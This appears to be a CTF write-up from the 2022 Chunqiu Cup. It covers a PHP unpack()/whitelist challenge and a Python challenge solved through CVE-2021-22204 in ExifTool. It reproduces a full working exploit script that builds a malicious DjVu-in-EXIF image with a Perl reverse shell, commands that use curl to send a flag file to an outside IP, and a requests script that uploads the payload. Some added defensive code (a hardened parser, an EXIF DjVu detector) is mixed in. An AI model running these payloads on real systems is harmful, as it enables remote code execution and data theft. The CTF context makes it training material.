2022 春秋杯 (Chunqiu Cup) Cybersecurity League, Spring Round: 勇者山峰 (Brave Peak)

easy_php

Challenge description: pwner: I've decided to start grinding web. How should I learn it? Never mind, let's start with basic PHP.

index.php

<?php
highlight_file(__FILE__);
error_reporting(0);
function createFolder($path)
{
    if (!file_exists($path)) {
        createFolder(dirname($path));
        mkdir($path, 0777);
    }
}

function savePostData()
{
    $content = $GLOBALS['HTTP_RAW_POST_DATA'];
    if (empty($content)) {
        $content = file_get_contents('php://input');
    }
    if ($content == null) {
        exit(0);
    }
    $format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen';
    $head = unpack("$format", $content);
    unset($format);
    $format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen' . '/a' . ($head["nFileNameLen"]) . 'chFileName' . '/a' . ($head["nFileDataLen"]) . 'data';
    $head = unpack("$format", $content);
    if (is_string($head["chFileName"])) {
        $fileName = $head["chFileName"];
        $white_func = array("readfile","unserialize","phpinfo");
        if (!in_array($fileName, $white_func)) {
            exit("hi hack!");
        }
        $fileName($head["data"]);
    }
    echo "FAIL";
}
savePostData();
?>

From this we get the way to construct the data that the unpack() format expects:

<?php
// Build a packet in the layout savePostData() parses: six 32-bit ints
// (the last two are the name length and data length), then the function
// name, then the data passed to it.
function savePostData($fn,$data)
{
    $datalen=strlen($data);
    $fnlen=strlen($fn);
    $content=pack("l6a".$fnlen."a".$datalen,1,2,3,4,$fnlen,$datalen,$fn,$data);
    // URL-encoded bytes (to paste into Burp) and the total packet length
    var_dump(urlencode($content),strlen($content));
}
$white_func = array("readfile","unserialize","phpinfo");
savePostData($white_func[2],'99999');
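Added example (not code from the writeup): the same packet layout in Python, with the server-side parse mirrored and then hardened. It assumes a little-endian host (PHP's `l` follows machine byte order) and a constructed length cap `MAX_FIELD`; the `HANDLERS` table shows what a safe version of the whitelist looks like, because the challenge's real weakness is that `readfile` and `unserialize` are themselves sinks for user-supplied data, so whitelisting their names protects nothing.

```python
import struct

# Header of the challenge packet: the six fields PHP unpacks with
# "lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen".
# PHP's "l" is a machine-order signed 32-bit int; little-endian (x86) is assumed.
HEADER_FMT = "<6i"
HEADER_LEN = struct.calcsize(HEADER_FMT)        # 24 bytes
FIELDS = ("nDataLen", "nHeadLen", "nPackTotal", "nPackNum",
          "nFileNameLen", "nFileDataLen")
MAX_FIELD = 1 << 16   # constructed cap on the name and data lengths

def build_packet(func_name, data):
    """Same bytes as the page's PHP pack("l6a<n>a<m>", ...) helper."""
    name = func_name.encode()
    header = struct.pack(HEADER_FMT, 1, 2, 3, 4, len(name), len(data))
    return header + name + data

def parse_packet(content):
    """Mirror the two-stage unpack() in savePostData(), adding the bounds checks it lacks."""
    if len(content) < HEADER_LEN:
        raise ValueError("packet shorter than header")
    head = dict(zip(FIELDS, struct.unpack(HEADER_FMT, content[:HEADER_LEN])))
    n_name, n_data = head["nFileNameLen"], head["nFileDataLen"]
    # The server trusts these two lengths and splices them into a second unpack()
    # format string. Reject negative or oversized values and anything that would
    # read past the body, instead of relying on unpack() quietly returning false.
    if not (0 <= n_name <= MAX_FIELD and 0 <= n_data <= MAX_FIELD):
        raise ValueError("length field out of range")
    if HEADER_LEN + n_name + n_data > len(content):
        raise ValueError("length fields exceed packet size")
    off = HEADER_LEN
    head["chFileName"] = content[off:off + n_name].decode("latin-1")
    head["data"] = content[off + n_name:off + n_name + n_data]
    return head

# The challenge whitelists function *names* and then calls $fileName($head["data"])
# on attacker-controlled data. readfile() and unserialize() are sinks in their own
# right (arbitrary file read, object injection), so a name whitelist is no control.
# The safer shape: a fixed map of names to handlers that never treat the payload
# as a path, code or serialized object.
def handle_phpinfo(_data):
    return "phpinfo"          # constructed stand-in; the payload is ignored

HANDLERS = {"phpinfo": handle_phpinfo}

def dispatch(content):
    head = parse_packet(content)
    handler = HANDLERS.get(head["chFileName"])
    if handler is None:
        return "hi hack!"
    return handler(head["data"])
```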

Insert the resulting bytes one at a time in Burp's hex view.


Strangely, readfile prints files fine when tested locally, but in the challenge readfile cannot read the file. No idea why....


bash CVE-2021-22204.sh "system('ls -al /> /tmp/1')" poc2.jpg && python3 1.py 

bash CVE-2021-22204.sh "system('curl -F "file=@/flag2" 47.99.70.18:4444')" poc2.jpg && python3 1.py

A Python challenge (I don't remember the name)

I only got half of the flag (/flag1), from the exif vulnerability; the other half, from the convert vulnerability, I did not solve. Many PoCs downloaded from the net did nothing (the same was true for the exif vulnerability, until I finally found the usable script below):

#!/bin/bash

RS='\033[0m'
R='\033[0;31m'
G='\033[0;32m'
LB='\033[1;34m'
CY='\033[0;36m'
W='\033[1;73m'

art=$(base64 -d <<< "H4sIAFNGCWEA/52OMRLEIAwD+7xiy1Dxm6s8w0f8+KxyUFx7eGQhodgBVs4viy8ptz5Qx75gqoqSc2sLBtRLHcfLgX6TusTtmOLDbEytlQn3yCATW5/Sz6DVbizf2j7fVDPteiHX+0f5diM+5rLxz/MATvFQnxwBAAA=" | gunzip)
printf "${G}$art${RS}"

# Check for params
if [ ${#@} -lt 2  ]; then
    echo -e "\nUsage: ./CVE-2021-22204 cmd image.jpg"
    echo -e "Eg: ./CVE-2021-22204 \"system('id')\" kitten.jpg" 
    echo -e "Reverseshell: ./CVE-2021-22204 \"reverseme IP PORT\" image.jpg"
    exit
fi

# Check djvulibre is installed. 
if [ $(dpkg-query -W -f='${Status}' "djvulibre-bin" 2>/dev/null | grep -c "ok installed") -eq 0 ];then
    echo -e -n "\n${R}Warning:${RS} djvulibre-bin is not installed.\n"
    echo -e "${G}Confirm: ${RS}"
    read -p  "Install djvulibre-bin now? (y/n): " confirm
    if [[ ${confirm} =~ ^([yY][eE][sS]|[yY])$  ]]; then
        sudo apt-get install djvulibre-bin -y
    else
        exit
    fi
fi

# Create payload
echo -e "\nCreating payload"

cmd="$1"

if [[ "${cmd:0:9}" = "reverseme" ]]; then
        ip=$(echo "$cmd"| cut -d " " -f 2)
        port=$(echo "$cmd"| cut -d " " -f 3)
        echo "IP: $ip"
        echo "PORT: $port"
cat <<EOF> payload
(metadata "\c\${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($port,inet_aton('$ip')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};};")
EOF

else
cat <<EOF > payload
(metadata "\c\${$1};")
EOF
fi

cat payload
echo -e "\n"

# Compress payload
bzz payload payload.bzz

# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

cat <<EOF> configfile
%Image::ExifTool::UserDefined = (
    # All EXIF tags are added to the Main table, and WriteGroup is used to
    # specify where the tag is written (default is ExifIFD if not specified):
    'Image::ExifTool::Exif::Main' => {
        # Example 1.  EXIF:NewEXIFTag
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
        # add more user-defined EXIF tags here...
    },
);
1; #end%
EOF

exiftool -config configfile '-HasselbladExif<=exploit.djvu' "$2"
rm configfile payload.bzz payload exploit.djvu

echo -e -n "\n${G}Finished${RS}"
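An added detection-side example, not part of the writeup or of the CVE script: the image the script produces is a JPEG whose EXIF tag 0xc51b carries a whole DjVu file, and a JPEG has no business embedding one, so an upload filter can walk the Exif APP1 segment and reject any entry whose value begins with the DjVu magic. The minimal JPEG builder and the sample values are constructed for this example; it assumes one Exif APP1 segment, inspects IFD0 only, and the builder only handles values longer than 4 bytes.

```python
import struct

DJVU_MAGIC = b"AT&TFORM"          # every DjVu container starts with "AT&T" + IFF85 "FORM"
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}   # TIFF field types

def exif_entries(blob):
    """Yield (tag, type, count, value_bytes) for each IFD0 entry of a JPEG's Exif APP1."""
    pos = 2                                       # skip SOI
    while pos + 4 <= len(blob) and blob[pos] == 0xFF:
        marker = blob[pos + 1]
        if marker in (0xD9, 0xDA):                # EOI / SOS: no more metadata segments
            return
        seglen = struct.unpack(">H", blob[pos + 2:pos + 4])[0]
        seg = blob[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            tiff = seg[6:]
            end = "<" if tiff[:2] == b"II" else ">"
            ifd0 = struct.unpack(end + "I", tiff[4:8])[0]
            n = struct.unpack(end + "H", tiff[ifd0:ifd0 + 2])[0]
            for i in range(n):
                e = ifd0 + 2 + 12 * i
                tag, typ, count, val = struct.unpack(end + "HHII", tiff[e:e + 12])
                size = TYPE_SIZE.get(typ, 1) * count
                # values of 4 bytes or fewer sit inline; larger ones live at offset `val`
                data = tiff[e + 8:e + 8 + size] if size <= 4 else tiff[val:val + size]
                yield tag, typ, count, data
            return
        pos += 2 + seglen

def scan_upload(blob):
    """Return findings for an uploaded 'JPEG' that smuggles a DjVu file in an EXIF tag."""
    findings = []
    for tag, typ, count, data in exif_entries(blob):
        if data.startswith(DJVU_MAGIC):
            findings.append(f"tag 0x{tag:04x}: value is a DjVu container ({count} bytes)")
    if not findings and DJVU_MAGIC in blob:
        findings.append("DjVu magic present outside parsed EXIF entries")
    return findings

def build_sample_jpeg(tag, value):
    """Constructed minimal JPEG: SOI, one Exif APP1 with a single ASCII IFD0 entry, EOI."""
    entry = struct.pack("<HHII", tag, 2, len(value), 26)   # value stored at TIFF offset 26
    tiff = b"II*\x00" + struct.pack("<I", 8) + struct.pack("<H", 1) + entry + b"\x00" * 4 + value
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```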

PoC that obtains the first half of the flag:

import os, sys
import requests

# challenge instance
url = "http://eci-2ze4iv6httpb9dlwbvru.cloudeci1.ichunqiu.com:8888"
session = requests.session()
# cmd = sys.argv[1]
# os.system(f"bash CVE-2021-22204.sh \"{cmd}\" poc2.jpg")
# poc2.jpg is the image produced by CVE-2021-22204.sh above
file = open("poc2.jpg", "rb").read()
files = [
    ('file', ('curl4444.jpg', file, 'image/jpeg')),
]
print(session.post(url + "/upload", files=files).text)     # upload the crafted image
print(session.get(url + "/info").text)                      # then hit the two endpoints
print(session.get(url + "/convert").text.split('"')[-2])